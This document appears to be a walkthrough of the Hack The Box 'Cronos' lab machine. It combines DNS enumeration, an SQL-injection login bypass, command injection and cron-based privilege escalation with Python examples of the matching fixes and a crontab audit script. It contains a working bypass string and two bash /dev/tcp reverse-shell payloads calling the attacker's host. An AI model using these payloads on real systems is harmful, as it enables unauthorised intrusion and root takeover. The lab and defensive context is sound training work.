cronos
IP:10.10.10.13
scan
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -sSV -T4 10.10.10.13
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-06 23:19 CST
Nmap scan report for 10.10.10.13
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds
web
Port 80 serves only the Apache default page, and a long directory brute-force turned up nothing.
Since the server also exposes DNS on port 53, that should be useful: do a reverse lookup of the IP against the box's own name server:
┌──(xavier㉿kali)-[~]
└─$ nslookup -ty=ptr 10.10.10.13 10.10.10.13
Server: 10.10.10.13
Address: 10.10.10.13#53
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
Bind the hostnames in /etc/hosts (or point your resolver at the box's DNS server):
┌──(xavier㉿kali)-[~]
└─$ sudo vim /etc/hosts
# Append the following at the end of the file:
10.10.10.13 ns1.cronos.htb
10.10.10.13 www.cronos.htb
10.10.10.13 cronos.htb
A quick look at the page suggests it is a CMS; the GitHub address is given as https://github.com/laravel/laravel
Scan the web paths again:
┌──(xavier㉿kali)-[~]
└─$ dirsearch -u http://cronos.htb -e php,html,txt -x 403 -t 100
Extensions: php, html, txt | HTTP method: GET | Threads: 100 | Wordlist size: 9901
Output File: /home/xavier/.dirsearch/reports/cronos.htb/_23-04-06_23-50-32.txt
Error Log: /home/xavier/.dirsearch/logs/errors-23-04-06_23-50-32.log
Target: http://cronos.htb/
[23:50:33] Starting:
[23:50:56] 301 - 306B - /css -> http://cronos.htb/css/
[23:50:58] 200 - 0B - /favicon.ico
[23:51:01] 200 - 2KB - /index.php
[23:51:02] 200 - 924B - /js/
[23:51:02] 301 - 305B - /js -> http://cronos.htb/js/
[23:51:10] 200 - 24B - /robots.txt
[23:51:16] 200 - 914B - /web.config
Task Completed
No exploitable point found there.
Back to DNS again: enumerate other names under the domain:
┌──(xavier㉿kali)-[~]
└─$ dnsenum --dnsserver 10.10.10.13 cronos.htb
dnsenum VERSION:1.2.6
----- cronos.htb -----
Host's addresses:
__________________
cronos.htb. 604800 IN A 10.10.10.13
Name Servers:
______________
ns1.cronos.htb. 604800 IN A 10.10.10.13
Mail (MX) Servers:
___________________
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
unresolvable name: ns1.cronos.htb at /usr/bin/dnsenum line 900.
Trying Zone Transfer for cronos.htb on ns1.cronos.htb ...
AXFR record query failed: no nameservers
Brute forcing with /usr/share/dnsenum/dns.txt:
_______________________________________________
admin.cronos.htb. 604800 IN A 10.10.10.13
Found another name: admin.cronos.htb
Scan the paths on it.
Brute-forcing the login revealed a universal-password (authentication bypass) login: admin'or 1=1 --+
Into the admin panel.
Check whether the tool in the panel is vulnerable to command injection:
nc reverse shell, payload:
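The bypass above works because the login form splices the submitted username into its SQL text. The following is an added illustration, not the admin panel's own code: a constructed in-memory SQLite table, the concatenating login the payload defeats, and the parameterised form that treats the same string as a plain username. The table, the stored credential and the function names are all assumptions for the demo; the payload is the writeup's, with the URL encoding undone (`+` is a space).

```python
import hmac
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo schema: one admin account with a known password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery-staple')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Input is spliced straight into the SQL text. A quote in the username closes
    # the string literal and "--" comments out the password check that follows.
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameter: the value can never alter the statement's structure, so the
    # entire submitted string is looked up as a username and simply finds no row.
    row = conn.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    # Constant-time comparison; a real deployment compares a password hash here.
    return hmac.compare_digest(row[0].encode(), password.encode())


# The writeup's payload, URL-decoded and with the spacing normalised.
BYPASS_USERNAME = "admin' or 1=1 -- "


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass accepted:", login_vulnerable(db, BYPASS_USERNAME, "wrong"))
    print("fixed, bypass accepted:     ", login_fixed(db, BYPASS_USERNAME, "wrong"))
```

The detection angle is the same string: a username field that arrives containing a quote followed by `or` and a comment marker is worth an alert in the web access log regardless of whether the query happened to be parameterised.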
command=/bin/bash+-c+"/bin/bash+-i+>%26+/dev/tcp/10.10.14.18/8888+0>%261"&host=
┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.13] 42952
bash: cannot set terminal process group (1337): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$
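The payload above shows the shape of the defect: the panel accepts a `command` field and a `host` field from the client and hands the result to a shell. As an added example (not the Cronos panel's code), the block below contrasts that concatenation with a hardened form: the client may only select an operation from a fixed allow-list, the target must parse as an IP address or a syntactically valid hostname, and the process is started from an argv list so no shell ever sees the input. The allow-list contents, the regex and the function names are assumptions for the demo.

```python
import ipaddress
import re
import subprocess
from typing import List

# Hostname per RFC 1123 label rules: 1-63 alphanumerics or hyphens per label,
# no leading or trailing hyphen, at most 253 characters in total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# The only diagnostics the tool may run; the client chooses a key, never a command.
ALLOWED_OPS = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute", "-m", "10"],
}


def is_valid_target(host: str) -> bool:
    """Accept a single IP address or DNS name; shell metacharacters never match."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.match(host) is not None


def build_command_vulnerable(command: str, host: str) -> str:
    # The pattern behind the writeup's payload: a client-supplied command string and
    # host are glued together and passed to /bin/sh, so whatever is in the command
    # field runs as the web server user.
    return f"{command} {host}"


def build_argv(op: str, host: str) -> List[str]:
    """Hardened form: fixed argv from the allow-list plus a validated target."""
    if op not in ALLOWED_OPS:
        raise ValueError(f"operation not allowed: {op!r}")
    if not is_valid_target(host):
        raise ValueError(f"invalid target: {host!r}")
    return ALLOWED_OPS[op] + [host]


def run_diagnostic(op: str, host: str, timeout: float = 10.0) -> subprocess.CompletedProcess:
    """Run without a shell: the argv list goes straight to execve()."""
    return subprocess.run(build_argv(op, host), shell=False, capture_output=True,
                          text=True, timeout=timeout)


if __name__ == "__main__":
    print(build_argv("ping", "10.10.10.13"))
    for bad in ("10.10.10.13; id", "$(id)", "-c"):
        print(bad, "->", is_valid_target(bad))
```

Validation alone is not the fix; the `shell=False` argv execution is. The regex exists so that an operator-facing tool produces a clear error for junk input rather than passing it to `ping` as an odd-looking argument, and rejecting a leading hyphen keeps a target from being read as an option.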
root
Information gathering: found the scheduled tasks:
www-data@cronos:/var/www/laravel$ cat /etc/cron*
cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
Note that /var/www/laravel/artisan is executed periodically as root; modify that file:
www-data@cronos:/var/www/laravel$ echo '<?php exec("/bin/bash -c '"'"'bash -i >& /dev/tcp/10.10.14.18/9999 0>&1'"'"'");' > artisan
www-data@cronos:/var/www/laravel$ cat artisan
cat artisan
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/9999 0>&1'");
www-data@cronos:/var/www/laravel$
On the other side, nc listens on port 9999:
┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.13] 39564
bash: cannot set terminal process group (5955): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cronos:~# cat /root/root.txt
cat /root/root.txt
708bxxxxxxxxxxx0c3b
root@cronos:~#
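The privilege escalation above has a single root cause: a root cron job executes a file that the web server user owns. The audit script below is an added example (not part of the writeup or of any tool it uses) that parses system-crontab-style lines, extracts the absolute paths each root job references, and flags any that a non-root user could modify. The crontab text is the one shown above with comments dropped; the file metadata is constructed to stand in for `os.stat()` on the box, with `artisan` owned by uid 33 (www-data) as the writeup found. Function names and the `StatFn` adapter are assumptions for the demo.

```python
import os
import re
import stat
from dataclasses import dataclass
from typing import Callable, Iterator, List, Optional, Tuple

# Constructed sample input: the job lines from the system crontab in this writeup.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# Constructed file metadata standing in for os.stat(): path -> (uid, gid, mode).
SAMPLE_STAT = {
    "/": (0, 0, 0o40755),
    "/etc/cron.hourly": (0, 0, 0o40755),
    "/var/www/laravel/artisan": (33, 33, 0o100755),   # owned by www-data: the defect
}

StatFn = Callable[[str], Optional[Tuple[int, int, int]]]


@dataclass
class Finding:
    user: str
    path: str
    reason: str
    line: str


def real_stat(path: str) -> Optional[Tuple[int, int, int]]:
    """os.stat() adapter for a live system; None when the path does not exist."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return st.st_uid, st.st_gid, st.st_mode


def weakness(meta: Optional[Tuple[int, int, int]]) -> Optional[str]:
    """Why a file a root job runs or reads could be altered by a non-root user."""
    if meta is None:
        return "target does not exist"
    uid, gid, mode = meta
    if uid != 0:
        return f"owned by uid {uid}, not root"
    if mode & stat.S_IWOTH:
        return "world-writable"
    if mode & stat.S_IWGRP and gid != 0:
        return f"group-writable by gid {gid}"
    return None


# Shell redirections such as ">> /dev/null" and "2>&1"; their targets are not executed.
REDIRECT_RE = re.compile(r"\d?[<>]{1,2}\s*\S+")


def parse_jobs(text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (user, command, raw_line) for /etc/crontab-style lines (field 6 is the user)."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                      # @reboot / @daily shorthand
            fields = line.split(None, 2)
            if len(fields) == 3:
                yield fields[1], fields[2], line
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or "=" in fields[0]:        # skip VAR=value lines
            continue
        yield fields[5], fields[6], line


def absolute_paths(command: str) -> List[str]:
    """Absolute paths a command references, excluding redirection targets."""
    stripped = REDIRECT_RE.sub(" ", command)
    return [tok for tok in stripped.split() if tok.startswith("/")]


def audit_crontab(text: str, stat_fn: StatFn = real_stat) -> List[Finding]:
    """Flag root jobs whose referenced files a non-root user could modify."""
    findings: List[Finding] = []
    for user, command, line in parse_jobs(text):
        if user != "root":
            continue
        for path in absolute_paths(command):
            reason = weakness(stat_fn(path))
            if reason:
                findings.append(Finding(user, path, reason, line))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, SAMPLE_STAT.get):
        print(f"[!] {f.path}: {f.reason}\n    {f.line}")
```

Run against a live host with `audit_crontab(open("/etc/crontab").read())` and the same for each file under /etc/cron.d. The check only covers paths written out in the job line; a command resolved through PATH (here `php`) and the contents of `run-parts` directories need a second pass, and the fix for the finding it reports is `chown root:root` plus removing group and world write on the script, or running the scheduler as the unprivileged owner instead of root.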